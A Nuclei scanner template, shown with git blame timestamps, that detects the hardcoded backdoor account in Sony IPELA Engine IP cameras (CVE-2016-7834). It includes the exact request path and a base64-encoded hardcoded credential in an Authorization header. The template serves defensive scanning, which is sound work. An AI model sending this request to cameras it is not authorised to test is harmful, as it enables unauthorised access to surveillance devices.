nuclei-templates/http/cves/2016/CVE-2016-7834.yaml

51 lines
1.5 KiB
YAML
Raw Normal View History

id: CVE-2016-7834
info:
name: Sony IPELA Engine IP Camera - Hardcoded Account
author: af001
severity: high
2022-05-24 09:49:12 +00:00
description: |
Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.
2023-09-06 13:22:34 +00:00
remediation: |
Upgrade to the latest version of the firmware provided by Sony.
2022-04-11 17:39:32 +00:00
reference:
- https://sec-consult.com/vulnerability-lab/advisory/backdoor-vulnerability-in-sony-ipela-engine-ip-cameras/
- https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/
- https://jvn.jp/en/vu/JVNVU96435227/index.html
- https://nvd.nist.gov/vuln/detail/CVE-2016-7834
2023-07-11 19:49:27 +00:00
- https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras
classification:
cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2016-7834
cwe-id: CWE-200
2023-07-11 19:49:27 +00:00
epss-score: 0.00202
2023-08-31 11:46:18 +00:00
epss-percentile: 0.57452
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: sony
product: snc_series_firmware
tags: sony,backdoor,unauth,telnet,iot,camera
http:
- method: GET
path:
- "{{BaseURL}}/command/prima-factory.cgi"
2022-05-24 09:49:12 +00:00
headers:
Authorization: Bearer cHJpbWFuYTpwcmltYW5h
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'gen5th'
- 'gen6th'
condition: or
2022-09-14 17:25:05 +00:00
- type: status
status:
- 204